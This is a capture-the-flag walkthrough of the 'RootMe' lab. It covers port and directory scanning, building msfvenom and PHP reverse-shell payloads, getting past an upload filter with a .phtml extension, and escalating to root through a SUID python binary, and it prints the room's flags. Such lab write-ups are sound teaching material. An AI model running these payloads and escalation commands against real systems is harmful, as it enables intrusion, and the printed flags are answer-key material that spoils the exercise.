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This guide contains the answer and steps necessary to get to them for the RootMe room.

Table of contents


  1. Scan the machine, how many ports are open?

We use nmap for this with:

nmap -sV -sS -p-     

Recon Nmap

Click for answer2

  1. What version of Apache is running?

The Apache version can be seen from the scan. Otherwise add the -sV argument.

Click for answer2.4.29

  1. What service is running on port 22?

This can also be found from the scan when using -sV.

Click for answerssh

  1. Find directories on the web server using the GoBuster tool.

  2. What is the hidden directory?

Finding hidden directories, can be done with the following command:

gobuster dir -u -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Recon Directory

One of these is not a standard folder for a webserver.

Click for answer/panel/

Getting a shell

  1. user.txt

The first to do is create a reverse shell payload. My first attempt was to use msfvenom to create a linux reverse tcp shell and output it as an .elf file.

msfvenom -p  linux/x64/meterpreter/reverse_tcp LHOST= LPORT=1337 -f elf -o letmein.elf

Shell Payload

This can now be uploaded to the webserver.

Shell Upload

Unfortunately, I did not get a connection as the files was simply downloaded. We need to try a different format. Php is another usefull format for a reverse shell.

msfvenom -p php/reverse_php LHOST= LPORT=1337 -f raw > letmein.php

Shell Payload Php

Shell Upload Php Fail

The server doesn't let us upload a .php file. This might be bypassed by renaming the file extension. Simply renaming to .jpg.php did not work in this case, but .phtml did.

mv letmein.php letmein.phtml 

Shell Upload Php Rename

Shell Upload Php Success

Now that it is uploaded we start our listener again and click on the file we uploaded in the /uploads/ directory.

nc -nlvp 1337

Shell Directory

Although the shell is connecting to our machine, it never seems to be fully established. So another method is in order. A pre-made php reverse shell can be obtained from 'pentestmonkey' on github.

Shell Php Script

We only need to add our own IP and port to listen on.

Shell Php Script Edit

Save this file with the phtml extension en upload to the server. Setup the listener on port 1337 and execute the file from the /uploads page.

Shell Connection


Now we can search for the file user.txt and open it to get our flag.

find / -name user.txt 2>/dev/null

Shell Flag

Click for answerTHM{y0u_g0t_a_sh3ll}

Privilege escalation

  1. Search for files with SUID permission, which file is weird?

Using: find / -perm -4000 2>/dev/null we can search for any binaries with their SUID bit set.


Click for answer/usr/bin/python

  1. Find a form to escalate your privileges.

  2. root.txt

After we identify the outlier, we can go to the GTFO bins website to find out how we can abuse this specific binary.

Priv Gtfo

We need to add the path to the python binary on this machine to the command. Then we can simply run it in our shell.

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Priv Escalation

We got root access!

Now lets search for the root flag.

find /root -name root.txt 2>/dev/null

Priv Root Flag

Click for answerTHM{pr1v1l3g3_3sc4l4t10n}